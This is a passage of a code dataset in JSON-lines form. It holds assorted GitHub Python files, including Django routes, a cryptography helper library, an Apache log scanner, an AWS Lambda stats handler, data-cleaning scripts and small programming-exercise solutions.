arg_parse()\n\n 
parse_config(options.config)\n\n if options.cache:\n cache_words(options.cache)\n elif options.merge:\n merge_db(options.merge)\n elif options.words:\n for word in options.words:\n lookup_word(word)\n else:\n interaction()\n\nif __name__ == '__main__':\n main()\n","repo_name":"leetking/ldcv","sub_path":"src/ldcv.py","file_name":"ldcv.py","file_ext":"py","file_size_in_byte":18714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"25297567097","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name = 'dashboard'\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('accounts/', views.accounts, name='accounts'),\r\n path('accounts/new/', views.AddAccount.as_view(), name='add_account'),\r\n path('accounts/delete/<int:id>', views.DeleteAccount.as_view(), name='delete_account'),\r\n path('accounts/run/<int:id>', views.RunAccount.as_view(), name='run_account'),\r\n path('accounts/stop/<int:id>', views.StopAccount.as_view(), name='stop_account'),\r\n path('profile/', views.profile, name='profile')\r\n]\r\n","repo_name":"Downsidelama/INSTAFOLLOWO","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"73513875848","text":"import pandas as pd\ncsv_list=['bakery.csv','home_goods_store.csv','supermarket.csv',\n'bank.csv','convenience_store.csv','liquor_store.csv',\n'bar.csv','department_store.csv','restaurant.csv',\n'cafe.csv','drugstore.csv', 'store.csv'\n]\nfor i in range(12):\n df = pd.read_csv(csv_list[i])\n df.drop(inplace = True,columns=\"Unnamed: 0\")\n df.drop_duplicates(inplace = True, ignore_index=True)\n df.to_csv(\"../no_dup/\" + csv_list[i])","repo_name":"Zachary-R-Wilson/Food-Deserts-and-Topeka","sub_path":"Extras/google_maps_data/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"11506582794","text":"def make_jsonifiable(model, data=[]):\n if data is None:\n return None\n\n keys = [column.key for column in model.__table__.columns if column.key is not 'password']\n json_data = []\n try:\n for row in data:\n json_row = {}\n for key in keys:\n if key is not 'password':\n json_row.update({key : getattr(row,key)})\n\n json_data.append(json_row)\n return json_data\n except TypeError:\n #not iterable\n json_row = {}\n for key in keys:\n json_row.update({key: getattr(data, key)})\n json_data.append(json_row)\n return json_data\n\n return [{\n 'error': 'Something went wrong parsing data model'\n }]\n\ndef update_model(table, row, request):\n keys = [column.key for column in table.__table__.columns]\n\n for key in keys:\n try:\n setattr(row, key, request.json[key])\n except KeyError:\n print('key error')\n\n return row\n\ndef format_features(FeatureRequest, features):\n formatted_features = []\n\n for feature in features:\n\n feature.target_date = str(feature.target_date)\n formatted_feature = make_jsonifiable(FeatureRequest, feature)\n\n user = feature.user_features\n if user is not None:\n formatted_feature[0]['user_name'] = feature.user_features.fullname\n else:\n formatted_feature[0]['user_name'] = 'N/A'\n\n client = feature.client_features\n if client is not None:\n formatted_feature[0]['client_name'] = feature.client_features.name\n else:\n formatted_feature[0]['client_name'] = 'N/A'\n\n product = 
feature.product_features\n if product is not None:\n formatted_feature[0]['product_name'] = feature.product_features.name\n else:\n formatted_feature[0]['product_name'] = 'N/A'\n\n formatted_features.append(formatted_feature[0])\n\n return formatted_features\n","repo_name":"Quixotical/Intuitive","sub_path":"src/backend/model_helpers.py","file_name":"model_helpers.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"346178795","text":"\"\"\"\nASTERIX Cat0 Security Layer\nLibrary\n\nA library used by all modules\n\"\"\"\n\nfrom nacl import signing, public\nfrom cryptography.fernet import Fernet\nfrom cryptography.hazmat.primitives import hashes, hmac\nimport os\nimport logging\n\ndef load_IEK_from_file(filepath: str) -> bytes:\n \"\"\"\n Loads the Initiation Encryption Key from a file.\n \"\"\"\n iek = None\n with open(filepath, 'rb') as file:\n iek = file.read()\n return iek\n\ndef fernet_generate_iek(filepath: str) -> None:\n \"\"\"\n Generates a random Initiation Encryption Key and saves it to a file\n \"\"\"\n with open(filepath, 'wb') as file:\n file.write(Fernet.generate_key())\n\ndef fernet_iek_cipher(iek: bytes, plaintext: bytes) -> bytes:\n \"\"\"\n Ciphers the plaintext using the provided IEK (using the Fernet Cipher)\n Returns the ciphertext\n \"\"\"\n f = Fernet(iek)\n return f.encrypt(plaintext)\n\ndef fernet_iek_decipher(iek: bytes, ciphertext: bytes) -> bytes|None:\n \"\"\"\n Deciphers the ciphertext using the provided IEK.\n Returns the plaintext if all provided arguments are correct, otherwise returns None\n \"\"\"\n f = Fernet(iek)\n try:\n return f.decrypt(ciphertext)\n except Exception as e:\n logging.error(e)\n return None\n\ndef eddsa_generate() -> tuple[signing.SigningKey, signing.VerifyKey]:\n \"\"\"\n Generates a random ED25519 keypair.\n Returns the generated private and public key.\n \"\"\"\n signkey = signing.SigningKey.generate()\n return (signkey, signkey.verify_key)\n\ndef eddsa_sign(signkey: signing.SigningKey, content: bytes) -> bytes:\n \"\"\"\n Signs the content using the ED25519 signing algorithm and the provided signing key.\n Returns the resulting signature.\n \"\"\"\n return signkey.sign(content).signature\n\ndef eddsa_verify(verifykey: signing.VerifyKey, signature: bytes, plaintext: bytes) -> bool:\n \"\"\"\n Verifies the ED25519 signature associated with a plaintext using a verifying key.\n Returns True if the verification was successful.\n \"\"\"\n try:\n verifykey.verify(plaintext, signature)\n return True\n except Exception as e:\n logging.error(e)\n return False\n\ndef curve_encr(verifykey: signing.VerifyKey, content: bytes) -> bytes:\n \"\"\"\n Encrypts the content with the content's recipient's public key\n Returns the ciphertext\n \"\"\"\n publkey = verifykey.to_curve25519_public_key()\n box = public.SealedBox(publkey)\n return box.encrypt(content)\n\ndef curve_decr(signkey: signing.SigningKey, ciphertext: bytes) -> bytes|None:\n \"\"\"\n Decrypts the ciphertext with the agent's own private key\n Returns the plaintext or None if the process failed\n \"\"\"\n privkey = signkey.to_curve25519_private_key()\n box = public.SealedBox(privkey)\n try:\n return box.decrypt(ciphertext)\n except Exception as e:\n logging.error(e)\n return None\n\ndef hmac_generate() -> bytes:\n \"\"\"\n Generates a random 20-bytes secret.\n Returns the generated secret.\n \"\"\"\n return os.urandom(20)\n\ndef hmac_sign(key: bytes, content: bytes) -> bytes:\n \"\"\"\n 
Signs the SHA-1 hash of the content using the provided key.\n Returns the signature.\n \"\"\"\n h = hmac.HMAC(key, hashes.SHA1())\n h.update(content)\n return h.finalize()\n\ndef hmac_verify(key, message, signature) -> bool:\n \"\"\"\n Verifies the authenticity and integrity of the message and its signature using the provided key.\n Returns True if the verification was successful.\n \"\"\"\n h = hmac.HMAC(key, hashes.SHA1())\n h.update(message)\n try:\n h.verify(signature)\n return True\n except Exception as e:\n logging.error(e)\n return False\n\n# Launching the lib file as a standalone allows the easy creation of a new IEK\nif __name__ == \"__main__\":\n fernet_generate_iek(input(\"Enter the filepath to save the new IEK: \"))\n","repo_name":"KirrimK/ASTERIX_cat0_sec_layer","sub_path":"src/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1821361531","text":"from .base import Scannable, DEBUG_LEVEL, OUTPUT_FORMAT\nimport os, json\nclass Apache(Scannable):\n def __init__(self):\n Scannable.__init__(self, \"Apache\", \"Apache web server\")\n self._log_paths = [\"/var/log/apache2/access.log\"]\n self.__threats = None\n\n def canRun(self):\n return Scannable.canRun(self)\n\n def scan(self):\n Scannable.scan(self)\n\n def scanFile(self, logfile):\n if not os.path.exists(logfile):\n return\n if self._debug_level == DEBUG_LEVEL.INFO:\n print(\"Scanning Apache log file: \" + logfile)\n threats = {\n 'fatal_error': [],\n 'not_found': [],\n 'unauthorized': [],\n }\n with open(logfile, \"r\") as f:\n for line in f:\n parts = line.split(\" \")\n ip = parts[0]\n date = parts[3]\n method = parts[5]\n path = parts[6]\n status = parts[8]\n if status.startswith(\"5\"):\n threats[\"fatal_error\"].append({\n \"ip\": ip,\n \"date\": date,\n \"method\": method,\n \"path\": path,\n \"status\": status\n })\n elif status == \"404\":\n threats[\"not_found\"].append({\n \"ip\": ip,\n \"date\": date,\n \"method\": method,\n \"path\": path,\n \"status\": status\n })\n elif status.startswith(\"4\"):\n threats[\"unauthorized\"].append({\n \"ip\": ip,\n \"date\": date,\n \"method\": method,\n \"path\": path,\n \"status\": status\n })\n self.__threats = threats\n if len(threats) > 0 and self._debug_level == DEBUG_LEVEL.INFO:\n print(\"Found \" + str(len(threats)) + \" threats in Apache log file: \" + logfile) \n for type_of_threat in threats:\n print(\"Type of threat: \" + type_of_threat)\n if len(threats[type_of_threat]) == 0:\n print(\"* No threats found\")\n for threat in threats[type_of_threat]:\n print(\"IP: \" + threat[\"ip\"])\n print(\"Date: \" + threat[\"date\"])\n print(\"Method: \" + threat[\"method\"])\n print(\"Path: \" + threat[\"path\"])\n print(\"Status: \" + threat[\"status\"])\n print()\n \n def export(self):\n if self._output_format == OUTPUT_FORMAT.JSON:\n return json.dumps(self.__threats)\n return self.__threats","repo_name":"mxnu/master_tool","sub_path":"modules/apache.py","file_name":"apache.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34225491493","text":"import tensorflow as tf\nfrom tensorflow.contrib.slim.nets import vgg\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.ops import random_ops\nfrom tensorflow.python.framework.ops import convert_to_tensor\n\n\nif __name__ == '__main__':\n batch_size = 1\n height, width = 224, 224\n with 
tf.Session() as sess:\n # inputs = random_ops.random_uniform((batch_size, height, width, 3))\n image = tf.image.decode_jpeg(tf.read_file('Aoba.jpg'))\n image_tensor = image.eval()\n image_tensor = tf.expand_dims(image_tensor, 0)\n image_tensor = tf.to_float(image_tensor)\n\n logits, end_points = vgg.vgg_19(image_tensor)\n sess.run(variables.global_variables_initializer())\n output = sess.run(end_points['vgg_19/pool5'])\n print(output.shape)\n\n","repo_name":"remorsecs/TF-Slim-Example","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38407314375","text":"#!/usr/bin/env python2\nimport cv2\nimport numpy as np\n\nclass gridmaker:\n def __init__(self,s,frame):\n self.s=s\n self.img = frame\n #self.img=cv2.imread(\"/home/benlee/catkin_ws/src/find_path/script/A_star_diff/frame.jpg\",0) #bring image\n self.h,self.w=self.img.shape #get image size h = height, w = width\n self.grid=np.zeros(shape=(26,32)) #make blank zero numpy \n\n def iswhite(self,a,b,block): # a = w, b = h, block = img \n h,w=block.shape\n count=0\n for i in range(b,b+20):\n for j in range(a,a+20):\n if(i<480 and j<640):\n if(block[i][j]>0): # >0 = 1 , means there is obstacle!!\n count=count+1\n #print(\"count\", count) \n if(count>225):\n return True\n return False\n\n\n def returnGrid(self):\n for i in range(0,self.w,self.s):\n for j in range(0,self.h,self.s):\n if(self.iswhite(i,j,self.img)):\n self.grid[int(j/self.s)][int(i/self.s)]=1\n #print(self.grid[int(j/self.s)][int(i/self.s)])\n #cv2.rectangle(frame,(i,j),(i+self.s,j+self.s),(255,0,0),-1)\n #else:\n #cv2.rectangle(frame,(i,j),(i+self.s,j+self.s),(255,0,0),1)\n\n return self.grid\n\nclass Basic_map:\n def __init__(self):\n self.Color_HSV = {}\n self.Color_HSV['RED'] = [126, 134, 0, 255, 255, 255]\n self.Color_HSV['YELLOW'] = [0, 65, 60, 40, 152, 255]\n self.Color_HSV['GREEN'] = [59, 61, 60, 100, 255, 255]\n\n self.x = 0\n self.y = 0\n return\n def Gmask_for_start_end(self,img,color):\n lowerBound = np.array(self.Color_HSV[color][:3])\n upperBound = np.array(self.Color_HSV[color][3:6])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n color_mask = cv2.inRange(hsv, lowerBound, upperBound)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n erosion = cv2.erode(color_mask, kernel,iterations =1)\n dilation = cv2.dilate(erosion, kernel, iterations=3)\n return dilation\n\n def find(self,img, color): #find specific color points, in this case start, end_nodes\n lowerBound = np.array(self.Color_HSV[color][:3])\n upperBound = np.array(self.Color_HSV[color][3:6])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n color_mask = cv2.inRange(hsv, lowerBound, upperBound)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n erosion = cv2.erode(color_mask, kernel,iterations =1)\n dilation = cv2.dilate(erosion, kernel, iterations=3)\n # frame=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n # th,frame=cv2.threshold(frame,127,255,cv2.THRESH_BINARY)\n _, contours, _ = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n if len(contours) > 0:\n for i in range(len(contours)):\n # Get area value\n area = cv2.contourArea(contours[i])\n print(\"area\",area)\n if area > 0: # minimum area\n rect = cv2.minAreaRect(contours[i])\n (self.x, self.y), (w, h), angle = cv2.minAreaRect(contours[i])\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n #cv2.drawContours(img, [box], 0, (0, 0, 255), 2)\n return True, round(self.x), round(self.y), 
w, h,dilation\n else:\n return False, 0, 0, 0, 0, dilation\n else:\n return False, 0, 0, 0, 0, dilation\n\n def obstacle_load(self,img): # make base_map that has obstacle pixel data\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, base_map = cv2.threshold(img_gray, 72, 255, 1)\n return base_map\n\n\ndef capture(ros_data):\n np_arr = np.fromstring(ros_data.data, np.uint8)\n image_np = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n frame = image_np\n # cv2.imwrite('frmae.jpg', frame)\n # cv2.waitKey(1) & 0xFF\n return frame\n\ndef interrupt_detection(captured, current, path):\n count = 0\n for (first, last) in path:\n for i in range(0,3):\n #### Difference between Captured vs. Current Frame \n if captured[first][last][i]!=current[first][last][i]:\n count = count + 1\n else:\n count = count\n if count >= 18:\n return 1\n else:\n return 0","repo_name":"benthebear93/capstone_pathplanning","sub_path":"capstone/scripts/A_star_diff/Img_process_gird.py","file_name":"Img_process_gird.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1424933356","text":"# G4 16120 PPAP\n# https://www.acmicpc.net/problem/16120\n# 자료 구조, 그리디 알고리즘, 스택\nimport sys\ninput = sys.stdin.readline\n\nlst = input().rstrip()\n\nstack = []\nppap = ['P','P','A','P']\nif lst == ppap or lst == ['P']:\n print('PPAP')\nelse:\n for i in lst:\n stack.append(i)\n if stack[-4:] == ppap:\n stack.pop()\n stack.pop()\n stack.pop()\n\nif stack == ppap or stack == ['P']:\n print('PPAP')\nelse:\n print('NP')\n\n# 시간초과\n# while lst.find('PPAP')>=0:\n# cnt = lst.count('PPAP')\n# lst = lst.replace('PPAP', 'P', cnt)\n# if lst=='P':\n# print('PPAP')\n# else:\n# print('NP')","repo_name":"hhongjj/Algorithm","sub_path":"BOJ/3.GOLD/G4_16120_PPAP.py","file_name":"G4_16120_PPAP.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41239093609","text":"import csv\nimport sys\n\n\ndef main():\n\n # TODO: Check for command-line usage\n if len(sys.argv) != 3:\n sys.exit(\"Usage: python dna.py data.csv sequence.txt\")\n\n csv_file_name = sys.argv[1]\n dna_file_name = sys.argv[2]\n\n # TODO: Read database file into a variable\n # TODO: Read DNA sequence file into a variable\n with open(csv_file_name, \"r\") as csv_file, open(dna_file_name, \"r\") as dna_file:\n csv_reader = csv.reader(csv_file)\n\n # Store header of CSV file in a string\n header = next(csv_file).rstrip()\n # Store STRs as a string by removing the first five letters from the\n # header string, e.g. \"Name,\"\n strs_as_string = header[5:]\n # Store STRs in a list\n strs = strs_as_string.split(',')\n\n # Store DNA sequence in a string by reading the DNA file\n dna = dna_file.read().rstrip()\n\n # A dictionary to store longest matches for each STR\n # E.g. 
the key is the STR and the corresponding value is the longest match\n # of that specific STR found in the DNA file.\n longest_matches = {}\n\n # TODO: Find longest match of each STR in DNA sequence\n for str in strs:\n longest_matches[str] = longest_match(dna, str)\n\n # TODO: Check database for matching profiles\n individual_is_found = False\n correct_individual = \"No match\"\n\n for individual in csv_reader:\n individual_is_potentially_a_match = True\n\n if individual_is_found:\n break\n else:\n for i in range(len(strs)):\n if longest_matches[strs[i]] != int(individual[i + 1]):\n individual_is_potentially_a_match = False\n break\n if individual_is_potentially_a_match:\n individual_is_found = True\n correct_individual = individual[0]\n break\n\n print(correct_individual)\n\n return\n\n\ndef longest_match(sequence, subsequence):\n \"\"\"Returns length of longest run of subsequence in sequence.\"\"\"\n\n # Initialize variables\n longest_run = 0\n subsequence_length = len(subsequence)\n sequence_length = len(sequence)\n\n # Check each character in sequence for most consecutive runs of subsequence\n for i in range(sequence_length):\n\n # Initialize count of consecutive runs\n count = 0\n\n # Check for a subsequence match in a \"substring\" (a subset of characters) within sequence\n # If a match, move substring to next potential match in sequence\n # Continue moving substring and checking for matches until out of consecutive matches\n while True:\n\n # Adjust substring start and end\n start = i + count * subsequence_length\n end = start + subsequence_length\n\n # If there is a match in the substring\n if sequence[start:end] == subsequence:\n count += 1\n\n # If there is no match in the substring\n else:\n break\n\n # Update most consecutive matches found\n longest_run = max(longest_run, count)\n\n # After checking for runs at each character in seqeuence, return longest run found\n return longest_run\n\n\nmain()","repo_name":"s-palgo/cs50","sub_path":"week6/pset6/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27996723859","text":"import datetime\nimport json\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Optional, Dict, Any\n\nimport aws_embedded_metrics\nimport boto3\nimport botocore.client\nfrom aws_embedded_metrics.logger.metrics_logger import MetricsLogger\n\nSTATIC_HEADERS = {\n \"Content-Type\": \"text/plain; charset=utf-8\",\n \"Cache-Control\": \"no-cache\",\n \"Access-Control-Allow-Origin\": \"*\",\n}\n\nRECORD_KEY = \"Records\"\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\n@aws_embedded_metrics.metric_scope\ndef lambda_handler(event, context, metrics):\n metrics.set_namespace(\"CompilerExplorer\")\n logger.info(\"Received new lambda event %s\", event)\n if RECORD_KEY in event:\n return handle_sqs(event, context)\n return handle_http(event, metrics)\n\n\ndef handle_sqs(\n event: Dict,\n context,\n s3_client: Optional[botocore.client.BaseClient] = None,\n now: Optional[datetime.datetime] = None,\n):\n s3_client = s3_client or boto3.client(\"s3\")\n now = now or datetime.datetime.utcnow()\n\n logger.info(\"Handling %d messages\", len(event[RECORD_KEY]))\n key = f\"stats/{context.function_name}-{now.strftime('%Y-%m-%d-%H:%M:%S.%f')}.log\"\n body = \"\\n\".join(r[\"body\"] for r in event[RECORD_KEY])\n bucket_name = os.environ[\"S3_BUCKET_NAME\"]\n logger.info(\"writing to %s with key %s\", bucket_name, key)\n 
s3_client.put_object(Bucket=bucket_name, Body=body, Key=key)\n\n\ndef handle_http(\n event: Dict,\n metrics: MetricsLogger,\n sqs_client: Optional[botocore.client.BaseClient] = None,\n dynamo_client: Optional[botocore.client.BaseClient] = None,\n now: Optional[datetime.datetime] = None,\n):\n sqs_client = sqs_client or boto3.client(\"sqs\")\n dynamo_client = dynamo_client or boto3.client(\"dynamodb\")\n now = now or datetime.datetime.utcnow()\n\n path = event[\"path\"].split(\"/\")[1:]\n method = event[\"httpMethod\"]\n if path == [\"pageload\"] and method == \"POST\":\n return handle_pageload(event, metrics, now, os.environ[\"SQS_STATS_QUEUE\"], sqs_client)\n\n if len(path) == 2 and path[0] == \"compiler-build\" and method == \"GET\":\n return handle_compiler_stats(path[1], os.environ[\"COMPILER_BUILD_TABLE\"], dynamo_client)\n\n return dict(\n statusCode=404,\n statusDescription=\"404 Not Found\",\n isBase64Encoded=False,\n headers=STATIC_HEADERS,\n body=\"Not found\",\n )\n\n\ndef handle_pageload(\n event: Dict, metrics: MetricsLogger, now: datetime.datetime, queue_url: str, sqs_client: botocore.client.BaseClient\n):\n date = now.strftime(\"%Y-%m-%d\")\n time = now.strftime(\"%H:%M:%S\")\n sqs_client.send_message(\n QueueUrl=queue_url,\n MessageBody=json.dumps(dict(type=\"PageLoad\", date=date, time=time, value=\"\"), sort_keys=True),\n )\n icons = urllib.parse.unquote_plus(event[\"queryStringParameters\"].get(\"icons\", \"\"))\n sponsors = list(filter(lambda x: x, icons.split(\",\")))\n for sponsor in sponsors:\n sqs_client.send_message(\n QueueUrl=queue_url,\n MessageBody=json.dumps(dict(type=\"SponsorView\", date=date, time=time, value=sponsor), sort_keys=True),\n )\n metrics.set_property(\"sponsors\", sponsors)\n metrics.put_metric(\"PageLoad\", 1)\n\n return dict(statusCode=200, statusDescription=\"200 OK\", isBase64Encoded=False, headers=STATIC_HEADERS, body=\"Ok\")\n\n\n# Example query from the UI\n# {\"TableName\":\"compiler-builds\",\"ReturnConsumedCapacity\":\n# \"TOTAL\",\"Limit\":50,\"KeyConditionExpression\":\"#kn0 = :kv0\",\n# \"ScanIndexForward\":false,\"FilterExpression\":\"#n0 = :v0\",\n# \"ExpressionAttributeNames\":{\"#n0\":\"status\",\"#kn0\":\"compiler\"},\n# \"ExpressionAttributeValues\":{\":v0\":{\"S\":\"OK\"},\":kv0\":{\"S\":\"gcc\"}}}\n\n\ndef _do_one_query(\n compiler: str, table: str, dynamo_client: botocore.client.BaseClient, status: Optional[str]\n) -> Optional[Dict]:\n params: Dict[str, Any] = dict(\n TableName=table,\n Limit=100, # NB limit to _evaluate_ not the limit of matches\n ScanIndexForward=False, # items in reverse order (by time)\n KeyConditionExpression=\"#key = :compiler\",\n ExpressionAttributeNames={\"#key\": \"compiler\"},\n ExpressionAttributeValues={\":compiler\": dict(S=compiler)},\n )\n if status is not None:\n params[\"FilterExpression\"] = \"#status = :status_filter\"\n params[\"ExpressionAttributeNames\"][\"#status\"] = \"status\"\n params[\"ExpressionAttributeValues\"][\":status_filter\"] = dict(S=status or \"na\")\n\n query_results = dynamo_client.query(**params)\n if query_results[\"Count\"]:\n most_recent = query_results[\"Items\"][0]\n return dict(\n path=most_recent[\"path\"][\"S\"],\n github_run_id=most_recent[\"github_run_id\"][\"S\"],\n timestamp=most_recent[\"timestamp\"][\"S\"],\n duration=int(most_recent[\"duration\"][\"N\"]),\n )\n return None\n\n\ndef handle_compiler_stats(compiler: str, table: str, dynamo_client: botocore.client.BaseClient) -> Dict:\n result = dict(\n last_success=_do_one_query(compiler, table, 
dynamo_client, \"OK\"),\n last_build=_do_one_query(compiler, table, dynamo_client, None),\n )\n return dict(\n statusCode=200,\n statusDescription=\"200 OK\",\n isBase64Encoded=False,\n headers={\n \"Content-Type\": \"application/json; charset=utf-8\",\n \"Cache-Control\": \"max-age: 180, must-revalidate\",\n \"Access-Control-Allow-Origin\": \"*\",\n },\n body=json.dumps(result),\n )\n","repo_name":"compiler-explorer/infra","sub_path":"lambda/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":304,"dataset":"github-code","pt":"16"} +{"seq_id":"70797709768","text":"\"\"\"append_illum_cols - Append columns corresponding to illumination functions to a LoadData .csv\n\n\"\"\"\nimport argparse\nimport csv\nimport os\nimport shutil\nimport tempfile\nfrom os import PathLike\nfrom typing import Union, Any\nimport yaml\n\n\ndef check_file_arg(arg: Union[bytes, str, PathLike]) -> Union[bytes, str, PathLike]:\n \"\"\"Make sure the argument is a path to a file\"\"\"\n if not os.path.isfile(arg):\n raise argparse.ArgumentTypeError(\n \"%s is not a path to an existing file\" % arg)\n return arg\n\n\ndef check_dir_arg(arg: Union[bytes, str, PathLike]) -> Union[bytes, str, PathLike]:\n \"\"\"Make sure the argument is a path to an existing directory\"\"\"\n if not os.path.isdir(arg):\n raise argparse.ArgumentTypeError(\n \"%s is not a path to an existing directory\" % arg)\n return arg\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Append columns corresponding to illumination \"\n \"functions to a LoadData .csv\")\n\n parser.add_argument(\"--plate-id\",\n dest=\"plate_id\",\n help=\"Plate ID\")\n\n parser.add_argument(\n \"--illum-directory\", type=check_dir_arg,\n dest=\"illum_directory\",\n help=\"The directory containing the illumination functions\")\n\n parser.add_argument(\n \"config_file\", type=check_file_arg,\n help=\"The config.yaml file that chooses channels and\"\n \" metadata for the CSV\")\n\n parser.add_argument(\n \"--illum_filetype\", default='.npy', dest='illum_filetype',\n help=\"The file type of the illum files- in CP2.X, this should be '.mat', in CP3.X '.npy'\")\n\n parser.add_argument(\n \"input_csv\", type=check_file_arg,\n help=\"The name of the LoadData .csv file to be manipulated\")\n\n parser.add_argument(\n \"output_csv\",\n help=\"The name of the LoadData .csv file to be created after appending\")\n\n return parser.parse_args()\n\n\ndef load_config(config_file: Union[bytes, str, PathLike]) -> (Any, Any):\n \"\"\"Load the configuration from config.yaml\"\"\"\n with open(config_file, \"r\") as fd:\n config = yaml.load(fd, Loader=yaml.BaseLoader)\n\n # if isinstance(config, list):\n # config = config[0]\n\n channels = config['channels']\n\n return channels\n\n\ndef main():\n\n options = parse_args()\n channels = load_config(options.config_file)\n nrows = sum(1 for _ in open(options.input_csv)) - 1\n\n tmpdir = tempfile.mkdtemp()\n\n with open(os.path.join(tmpdir, 'illum.csv'), 'w') as fd:\n writer = csv.writer(fd, lineterminator='\\n')\n\n write_csv(writer, channels, options.illum_directory, options.plate_id, nrows, options.illum_filetype)\n\n\n\n os.system('paste -d \",\" {} {} > {}'.format(options.input_csv,\n os.path.join(tmpdir, 'illum.csv'),\n options.output_csv\n ))\n\n\n shutil.rmtree(tmpdir)\n\n\ndef write_csv(writer, channels, illum_directory, plate_id, nrows, illum_filetype, sub_string_out='', sub_string_in=''):\n header = sum(\n [[\"_Illum\".join((prefix, 
channel.replace(\"Orig\", \"\"))) for prefix in [\"FileName\", \"PathName\"]] for channel in\n sorted(channels.values())], [])\n\n writer.writerow(header)\n\n row = sum([[plate_id + '_Illum' + channel.replace(\"Orig\", \"\") + illum_filetype, illum_directory] for\n channel in sorted(channels.values())], [])\n if sub_string_in != '' and sub_string_out != '':\n row = [x.replace(sub_string_out,sub_string_in) for x in row]\n writer.writerows([row] * nrows)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"broadinstitute/pe2loaddata","sub_path":"src/pe2loaddata/append_illum_cols.py","file_name":"append_illum_cols.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42708791254","text":"from pyspark import keyword_only\nfrom pyspark.ml import Transformer\nfrom pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param, Params, TypeConverters\nfrom pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable\nfrom pyspark.sql.types import DoubleType\nimport pyspark.sql.functions as F\nimport math\n\n\nclass DateTransformer(Transformer, HasInputCol, HasOutputCol, DefaultParamsReadable, DefaultParamsWritable):\n input_col = Param(Params._dummy(), \"input_col\", \"input column name.\", typeConverter=TypeConverters.toString)\n \n @keyword_only\n def __init__(self, input_col=\"input\"):\n super(DateTransformer, self).__init__()\n self._setDefault(input_col=None)\n kwargs = self._input_kwargs\n self.set_params(**kwargs)\n \n @keyword_only\n def set_params(self, input_col=\"input\"):\n kwargs = self._input_kwargs\n self._set(**kwargs)\n \n def get_input_col(self):\n return self.getOrDefault(self.input_col)\n \n def _transform(self, df):\n input_col = self.get_input_col()\n \n month_cos_udf = F.udf(lambda month: math.cos(2*math.pi*float(month)/12.0) if month is not None else None, DoubleType())\n month_sin_udf = F.udf(lambda month: math.sin(2*math.pi*float(month)/12.0) if month is not None else None, DoubleType())\n \n # Extract month and year components\n df = df.withColumn(\"month\", F.month(input_col))\n df = df.withColumn(input_col + '_year', F.year(input_col))\n \n # Convert month to vector\n df = df.withColumn(input_col + '_month_cos', month_cos_udf(F.col(\"month\")))\n df = df.withColumn(input_col + '_month_sin', month_sin_udf(F.col(\"month\")))\n \n # Drop intermediate columns\n df = df.drop(\"month\", input_col)\n \n return df","repo_name":"kilimanj4r0/IBD","sub_path":"scripts/date_transformer.py","file_name":"date_transformer.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26602927348","text":"n = int(input())\nfigurinhas = []\nrepetidas = []\nvalores = []\n\nfor i in range(n):\n x = int(input())\n figurinhas.append(x)\n\nfor figurinha in figurinhas:\n if figurinha not in valores:\n valores.append(figurinha)\n else:\n repetidas.append(figurinha)\n\nprint(len(valores))\nprint(len(repetidas))\n","repo_name":"EdilsonJr/Uri-Judge-Python","sub_path":"ad-hoc/3129.py","file_name":"3129.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"15053089550","text":"from tech_news.database import search_news\nfrom datetime import datetime\n\n\ndef search_by_title(title: str):\n news = search_news({\n \"title\": {\"$regex\": title, \"$options\": \"i\"},\n })\n\n return [\n 
